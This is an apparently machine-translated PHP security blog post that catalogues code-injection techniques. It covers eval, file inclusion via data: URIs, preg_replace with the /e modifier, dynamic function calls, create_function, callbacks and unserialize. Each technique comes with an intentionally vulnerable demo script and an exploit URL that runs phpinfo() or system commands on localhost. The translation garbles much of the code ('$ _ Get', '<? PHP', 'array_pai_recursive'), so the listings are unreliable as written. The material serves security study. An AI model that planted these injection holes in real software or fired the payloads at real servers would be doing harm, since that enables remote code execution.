A feast for PHP security enthusiasts Month of PHP security. I read a lot of articles on PHP-security and shared them. They are all idols.
From: http://hi.baidu.com/menzhi007 Code execution function
Functions that can execute code in PHP. Such as eval (), assert (), ", system (), exec (), shell_exec (), passthru (), Escapeshellcmd (), pcntl_exec (), etc.
DEMO code 1.1:
<? PHP
Echo 'dir ';
?> 2. File Inclusion code injection
File contains code injection of functions under specific conditions, such as include (), include_once (), require (), and require_once ().
When allow_url_include = on and PHP version> = 5.2.0, code injection occurs.
DEMO code 2.1:
<? PHP
Include ($ _ Get ['a']);
?>
Access http: // 127.0.0.1/include. php? A = data: text/plain, % 3C? PHP % 20 phpinfo % 28% 29 ;? % 3E:
Run phpinfo (). Three-Regular Expression matching code injection
Code injection caused by the well-known preg_replace () function. When the/e pattern modifier exists in pattern, code execution is allowed. We will discuss this in three cases.
3.1 preg_replace () pattern parameter Injection
Pattern is the code injection of the first parameter.
When magic_quotes_gpc = off, the code is executed.
DEMO code 3.1:
<? PHP
Echo $ Regexp = $ _ Get ['reg '];
$ Var = '<php> phpinfo () </php> ';
Preg_replace ("/<php> (.*?) $ Regexp ", '\ 1', $ var );
?>
Access http: // 127.0.0.1/preg_replace1.php? Reg = % 3C \/PHP % 3E/e that is
Run phpinfo ().
3.2 preg_replace () Replacement parameter Injection
Replacement is the code injection of the second parameter, resulting in code execution.
DEMO code 3.2:
<?
Preg_replace ("/menzhi007/E", $ _ Get ['H'], "jutst test ");
?>
When we submit http: // 127.0.0.1/preg_replace2.php? H = phpinfo () that is
Run phpinfo ().
3.3 preg_replace () injection of the third parameter
We construct the subject parameter to execute the code. Submit: http: // 127.0.0.1/preg_replace3.php? H = [PHP] phpinfo () [/PHP]
Or http: // 127.0.0.1/preg_replace3.php? H = [PHP] $ {phpinfo % 28% 29} [/PHP] cause code execution
DEMO code 3.3:
<?
Preg_replace ("/\ s * \ [PHP \] (. + ?) \ [\/PHP \] \ s */ies "," \ 1 ", $ _ Get ['H']);
?> 4. Dynamic Code Execution
4.1 dynamic variable Code Execution
DEMO code 4.1:
<? PHP
$ Dyn_func = $ _ Get ['dyn _ func'];
$ Argument = $ _ Get ['argument'];
$ Dyn_func ($ argument );
?>
We submit http: // 127.0.0.1/dyn_func.php? Dyn_func = System & amp; argument = ipconfig execute the ipconfig command
4.2 Dynamic Function Code Execution
DEMO code 4.2:
<? PHP
$ Foobar = $ _ Get ['foobar'];
$ Dyn_func = create_function ('$ foobar', "echo $ foobar ;");
$ Dyn_func (");
?>
We submit http: // 127.0.0.1/create_function.php? Foobar = SYSTEM % 28dir % 29 run the Dir command Five others
5.1 code execution of the ob_start () function
DEMO code 5.1:
<? PHP
$ Foobar = 'system ';
Ob_start ($ foobar );
Echo 'dir ';
Ob_end_flush ();
?>
5.2 code execution of the array_map () function
DEMO code 5.2:
<? PHP
$ Evil_callback = $ _ Get ['callback'];
$ Some_array = array (0, 1, 2, 3 );
$ New_array = array_map ($ evil_callback, $ some_array );
?>
We submit http: // 127.0.0.1/array_map.php? Callback = phpinfo: Execute phpinfo ().
5.3 unserialize () and eval ()
Unserialize () is a function with high usage in PHP. Improper use of unserialize () may cause security risks.
(Black brother that challenge 2 http://hi.baidu.com/hi_heige/blo... 5b18f499250a9b.html)
DEMO code 5.3:
<? PHP
Class Example {
VaR $ Var = ";
Function _ destruct (){
Eval ($ this-> var );
}
}
Unserialize ($ _ Get ['saved _ Code']);
?>
We submit http: // 127.0.0.1/unserialize. php? Saved_code = O: 7: % 22 example % 22: 1: {s: 3: % 22var % 22; S: 10: % 22 phpinfo % 28% 29; % 22 ;} Execute phpinfo ().
5.4 functions that may easily cause security problems
There are many functions of the same type
Array_map ()
Usort (), uasort (), uksort ()
Array_filter ()
Array_reduce ()
Array_diff_uassoc (), array_diff_ukey ()
Array_udiff (), array_udiff_assoc (), array_udiff_uassoc ()
Array_intersect_assoc (), array_intersect_uassoc ()
Array_uintersect (), array_uintersect_assoc (), array_uintersect_uassoc ()
Array_walk (), array_pai_recursive ()
Xml_set_character_data_handler ()
Xml_set_default_handler ()
Xml_set_element_handler ()
Xml_set_end_namespace_decl_handler ()
Xml_set_external_entity_ref_handler ()
Xml_set_notation_decl_handler ()
Xml_set_processing_instruction_handler ()
Xml_set_start_namespace_decl_handler ()
Xml_set_unparsed_entity_decl_handler ()
Stream_filter_register ()
Set_error_handler ()
Register_shutdown_function ()
Register_tick_function () |